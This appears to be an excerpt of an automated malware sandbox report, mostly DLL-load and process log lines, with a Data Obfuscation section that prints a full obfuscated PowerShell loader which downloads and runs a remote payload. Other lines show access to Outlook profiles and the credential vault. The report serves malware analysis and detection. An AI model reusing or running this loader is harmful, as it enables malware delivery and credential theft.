          Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: iertutil.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wldp.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: winhttp.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: winnsi.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: urlmon.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: srvcli.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: netutils.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: schannel.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: mskeyprotect.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ntasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptsp.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rsaenh.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: gpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ncrypt.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: ktmw32.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: ieframe.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: mlang.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptdlg.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msoert2.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msftedit.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Windows\SysWOW64\msftedit.dll
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\ktmutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbu] source: powershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdbGCTL source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbL/d source: powershell.exe, 00000001.00000002.2402315774.000001F2B7850000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdb source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: osqpHpjBCXXA.exe, 0000000B.00000002.2979840816.00000000009CE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.2399198190.000001F2B75CB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h.B source: powershell.exe, 00000001.00000002.2402315774.000001F2B789F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wabmig.exe, wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdbGCTL source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdb source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000001.00000002.2400865654.000001F2B7654000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#Debrief klargoeringstekniker overmor", "", "", "0");
          Source: Yara match File source: 00000006.00000002.2229243853.0000000009BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2218750416.000000000596A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.2228656875.0000000008900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Tarsonemid)$global:bolchernes = [system.Text.Encoding]::AsCII.Getstring($Tumlen)$global:Ccilius=$bolchernes.substring($Disingenious,$Rygte)<#Velate Bredtfavnendes Systemise Viceforma
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unbog $Projektlederen $Profitableness), (Manifestets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sulamith = [AppDomain]::CurrentDomain.GetAssemblies()$
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Luftigheder)), $Depositions).DefineDynamicModule($Faktureringsadressen, $false).DefineType($Fordelte, $Anerkendte, [System.MulticastDe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Tarsonemid)$global:bolchernes = [system.Text.Encoding]::AsCII.Getstring($Tumlen)$global:Ccilius=$bolchernes.substring($Disingenious,$Rygte)<#Velate Bredtfavnendes Systemise Viceforma
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMCla
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
